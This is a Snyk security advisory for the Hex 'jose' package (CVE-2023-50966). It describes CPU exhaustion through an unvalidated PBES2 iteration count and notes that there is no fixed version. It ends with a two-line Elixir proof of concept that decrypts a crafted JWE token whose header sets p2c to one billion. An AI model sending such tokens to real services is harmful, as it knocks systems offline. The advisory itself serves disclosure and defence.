Resource Exhaustion Affecting jose package, versions *
Snyk CVSS
Attack Complexity
Low
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.05% (15th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-HEX-JOSE-6468183
- published 20 Mar 2024
- disclosed 19 Mar 2024
- credit P3ngu1nW
Introduced: 19 Mar 2024
CVE-2023-50966 Open this link in a new tabHow to fix?
There is no fixed version for jose
.
Overview
Affected versions of this package are vulnerable to Resource Exhaustion due to improper validation of the p2c
(PBES2 Count) value in a JOSE header. An attacker can cause excessive CPU consumption by sending crafted JOSE headers.
PoC
iex(1)> jwk_secret = JOSE.JWK.from_oct("secret")
#JOSE.JWK<keys: :undefined, fields: %{}, ...>
iex(2)> JOSE.JWE.block_decrypt(jwk_secret, "eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIiwicDJjIjoxMDAwMDAwMDAwLCJwMnMiOiJmbmcxUVJNU1ljWDljb2s4RUhHWWhnIn0.YZBzMWbcndBWvOjf4c3R2oPtRsRqSKDc.rv6Qc-lKE0WA6-MI.bHE.hNkOsML8iJJWbd1KwDEGHQ") |> elem(0)